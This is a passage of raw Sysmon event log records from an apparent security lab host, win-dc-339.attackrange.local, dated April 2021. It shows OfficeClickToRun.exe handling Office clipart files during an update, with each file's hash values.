Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL01395_.WMFMD5=0D9332D21D016A03682777DFF84320BF,SHA256=5BADBB51C508E06D0FD6AB5CBEBFB1DAAD688FCA66E0AE3FE687791B4E73FC25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL01394_.WMFMD5=7A7CBD2ADDBD10F3671385E927D03FFE,SHA256=5021A3DBC6B793F37F3A6FC18D9D00A72027A4FF439C593FA028963B5E12BE93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL01041_.WMFMD5=C4D5D6347519C04D4A55D5C7A36389BB,SHA256=314607DDB298FF45770EBCAB4B06955E28EDC1654C9FEB0727B4B143FF0C6580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL01040_.WMFMD5=3A3334E4C5F5A1A03BBE9851723F83DB,SHA256=9180C98CA307247F5441146A8B79E42B5FBD370448EC9504E50C269DE48A3035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00712_.WMFMD5=180546C960C0CE6623F14724DA187C99,SHA256=9FDC21786FDC41829B3D75E6BA3A37C069BF44993D53AD12453CD5A23AD35B5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00452_.WMFMD5=59F8CA950FC8868892A4DCC1D6D4C45A,SHA256=E7942E135DC1D3347B615DCCCAF5C4DF48F611002E811D5E29DFA34A05C07F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00345_.WMFMD5=86180EAD4A30F1B5F308B5F1D0C71EBF,SHA256=B6F28107EE2FC556FB014815A3F532A2A8AB247B2311E043D9E8CB1080395219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00308_.WMFMD5=CA1892894F6AF3D900D1B17786877640,SHA256=1908F5B528BF6C65C508B93C174C34C9133F8443926DDE0C7215541BC9B70A97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00298_.WMFMD5=1DD5F29C3541F1657550C27FE77D6235,SHA256=7E69C1298773D99B6CBCB880329DE0F7EF4E22D8AB077572A620D0172AD7EE04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00286_.WMFMD5=D802343A01D9DF9A8FF7C48BE5B5A465,SHA256=691A1376FBC72CD8A944F164AF1E9ED69B03F6DFB6433BFF7F94317CCD8456FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00268_.WMFMD5=37757261D58A8FE94FA49E6DBE9008C6,SHA256=30ABE9D834146EBA91BA1383EC051D5BFD402E4F56593D2A1DC6FAEF7CB8E675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00260_.WMFMD5=51D60CFAF67802DD839F03EFC56AB54E,SHA256=3FF671E885931ACC0AD59D431BB208A64B2FE92D1AE639C8DE5AEDBBAA2AF65F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL00256_.WMFMD5=B7B76C073D415EF22FEB50EAFD4915E1,SHA256=CC03AC3FC37A0A819E4574B35103F0CD73517C148E5308AE5D0EDCD2F6C3BE47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SHOW_01.MIDMD5=58E877FBB78B5FCD0CEDC99EBD6C9375,SHA256=EF18E2C867542C18DE2543047FCF6916A7427B8C57B0B0400367A2470E2DF68E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SCHOL_02.MIDMD5=DE5C1809AE6E60EB19F71B15D0D29F3A,SHA256=E21D46ED42154D57DC4295704F98379D135AF98C11B7E3FF4CA85870EA219CFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SAFRI_01.MIDMD5=9B685D91E0AF81C64A2E4D00B86CAE78,SHA256=7847D90818B9DCF837C6208E2D49FAD4F409815FFDA0294CB4224DD76CCF2A18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\ROAD_01.MIDMD5=A4851D7AEE73B50F3701867659192C3F,SHA256=12BE71415E8FEEEC2FC7399DBDFE3BDE75A181E69538B2B0CD95542A1BCDC698,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\RECYCLE.WMFMD5=5DC54BD1E59F57C77AEEC87EDC04E063,SHA256=B970AE8656100E05D7D1EC64381356A1A0C3F57272AC8B7C5D5141C7E4264A7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\RE00006_.WMFMD5=D09731F5A4C79E20875D11C8285FBDDF,SHA256=9A910B2E0E33EAAAB96C512714C401CB6227CBCAC85B371FDF686C4C1C6E0DBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PSWAVY.WMFMD5=525D75152D2992B83096A73640765CB1,SHA256=495B5AB575B9502217C83443CCEE7BD8E297A8B15FCA257D1488D3A4A2081F3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PSSKETSM.WMFMD5=6D5E1FC0FEB2DB6887E1AB752927DACF,SHA256=ABA3D338D6C7A89EEB960D2E53F44D5D4C0F544E1A189E1E53E1F307570EF8C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PSSKETLG.WMFMD5=AF22DE65CEA57EF3AC76EC243748E7C6,SHA256=28B042A1E2A252C42B3BDC979F5FDE3767DCB301837F9588B865B31F45B540D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PSRETRO.WMFMD5=47F1BAC77F79EB5C25AFEA09EE0522B1,SHA256=F1F97069CA045028C0F9E8F11EE9901E5E644605A5761DF3B287B0D109DF17F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PRRTINST.WMFMD5=B77C1EDACF5CCCACEE46D11B6A98788C,SHA256=40B6CD81D07F7992FAF87798179A6B8A1529C106EFB045FF7829DC1C73B6D189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PRRT.WMFMD5=4A2567DCF55FC3FF7CF81C41DE537CDC,SHA256=7AAE585D65412F49D797D0795038F592A5CC688B246891BAA9D3149C149FF4A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03425I.JPGMD5=25EAB8322D25D771E21A82876229C540,SHA256=A977606A895BCBD5173E0AB51149D1CC1AF0B3CEED178FDA3C0C9681CB9D8A5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03380I.JPGMD5=7DA70F6CA2D21BA471FEDA731B4D860E,SHA256=6795454BF1D30DD9A3852727DBA6E5D1ED0EAF304B11E294CAFF8291CE311019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03379I.JPGMD5=CD05469AF65A035A033E4D74B04A3B5E,SHA256=2DA2A2A9B05BAFCBE7A6241574E52BC0EDA6B51ACEF8FDA3131504B8E086FFDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03224I.JPGMD5=D66185F39B281523677689B0F1CD3169,SHA256=10BA56532F7F66B001AFF63A7FB00F20AE49940DDC66B2914B710CB9083793A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03205I.JPGMD5=BABE56F1CCB2A2FA325FB2E77522B00D,SHA256=EC5EF5CF4CAD39B4F599AC188781C653DE6517E936C02B30D6817C3DD38FCCF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03143I.JPGMD5=4C4801EDAF87675DB222284BBFEF82D4,SHA256=EF1684305DCE3FE9DEC08B95389961179516B7004343D8A603847F22E09B5401,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03041I.JPGMD5=9A0799B8B9339CEC6A61177419DAFD96,SHA256=A26BF81E32183B6A6351813A3CD2B3EB732A942C087A2DF272888EC1B5420DD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03014_.GIFMD5=83C9DE54BD0F2550BFD0760B1C39119C,SHA256=BC560D2CA1D7F783A7D6727E5773013CC7A2899D70857D30110C52755B7D57CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03012U.BMPMD5=6B469D16E0D65416348E78998B0E9652,SHA256=E6C4A09E60E25AC7BBBB3DC9DCDAF6272E148F75CB135CFDFF6272FB7BDDEA2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH03011U.BMPMD5=F383C3D92875FBFF9018C6F775F15ED1,SHA256=4FAA91DC514EEB9EE825CAF1EC83F693C9DD925EBF49E1254792B58F01440972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02897J.JPGMD5=254D2BB1BBE6B12EDDAC34C3E2B81C99,SHA256=ECA3CE106D4E0F622EBF80D9B18D36405240DCBEB4AE47694AED186007DAFD42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02845G.GIFMD5=D40242738F2670C2E7FC456D859D4621,SHA256=6FA4A7C8766B672D0E69F304ABAA04A0E5779E30C38A7F947BD4D22944303C5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02829J.JPGMD5=C06B359598D5CDB17FBA998531B9CAE1,SHA256=1CAC73562ECD2899FAB4381E9AAB5C1D9C86FADAE068D90CADB3C40E8E98129B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02810J.JPGMD5=BFD25215B23A9BF8EA0E8CAFCADD174D,SHA256=2BBE18076A46D23758E7DB41BFA82820600D1ABE6CC95D4AF2B8DBF8B349D1FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02759J.JPGMD5=4F72BA09B29716FAB267FD82B43BA82B,SHA256=2AEAC6E5D724170B84DED91938B135B806C3C0157D06F7248F6636F7A5E4783B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02758U.BMPMD5=D058A7C500C03985BB02275B22864E8E,SHA256=90F7F1BFA817D4F79F20EF27B681BD32AEE2B6E32E1D5DDAAAD3549807927846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02757U.BMPMD5=896BD2E3ADB442E977FAE496E0290D6F,SHA256=85E274B231AFD0967F7D4B4444339E8543181B6C8D5391B13B441E48EF555122,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02756U.BMPMD5=A8B0B5E63FA01C6A02FF6E5D4491855C,SHA256=44B3C21D0909AB683729372D09F6144B9F37B323249A4E9DEB65FAFB66AF19ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02755U.BMPMD5=1CAC1EABB2CEEDED07A65713835C12F0,SHA256=F079BCD70044BF3C0D7C7366737BB7F99C6CAC0521483FB145026817EE83364B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02754U.BMPMD5=FD9FE373F3DE7EE47F0AF0AD77E63637,SHA256=9D43B061EB7FD139EACE35F0D87DE58F06160FDE78B50222ED314205B472782D,IMPHASH=00000000000000000000000000000000falsetrue 